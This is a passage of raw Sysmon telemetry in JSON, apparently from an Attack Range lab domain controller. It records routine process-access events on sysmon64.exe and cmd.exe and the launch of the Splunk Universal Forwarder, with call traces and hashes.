3dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3495,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.680\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.680","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3496,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.680\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.680","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3497,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.680\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.680","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3498,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.680\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.680","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3499,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.680\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.680","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3500,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.680\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.680","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3501,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.680\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-0010F6780500}\r\nSourceProcessId: 3336\r\nSourceThreadId: 1980\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-1103-5F25-0000-0010DF790500}\r\nTargetProcessId: 4400\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.680","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010F6780500}","SourceProcessId":"3336","SourceThreadId":"1980","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010DF790500}","TargetProcessId":"4400","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3502,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.692\r\nProcessGuid: {E2A3D6B1-1103-5F25-0000-00109B7A0500}\r\nProcessId: 4432\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nFileVersion: 8.0.2\r\nDescription: splunk Application\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal_extra_splunkd_service_args\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3\r\nParentProcessGuid: {E2A3D6B1-1103-5F25-0000-0010DF790500}\r\nParentProcessId: 4400\r\nParentImage: C:\\Windows\\System32\\cmd.exe\r\nParentCommandLine: C:\\Windows\\system32\\cmd.exe /c \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\" _internal_extra_splunkd_service_args","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.692","ProcessGuid":"{E2A3D6B1-1103-5F25-0000-00109B7A0500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","FileVersion":"8.0.2","Description":"splunk Application","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal_extra_splunkd_service_args","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3","ParentProcessGuid":"{E2A3D6B1-1103-5F25-0000-0010DF790500}","ParentProcessId":"4400","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentCommandLine":"C:\\Windows\\system32\\cmd.exe /c \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\" _internal_extra_splunkd_service_args","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3503,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.680\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-0010DF790500}\r\nSourceProcessId: 4400\r\nSourceThreadId: 4288\r\nSourceImage: C:\\Windows\\system32\\cmd.exe\r\nTargetProcessGUID: {E2A3D6B1-1103-5F25-0000-00109B7A0500}\r\nTargetProcessId: 4432\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: 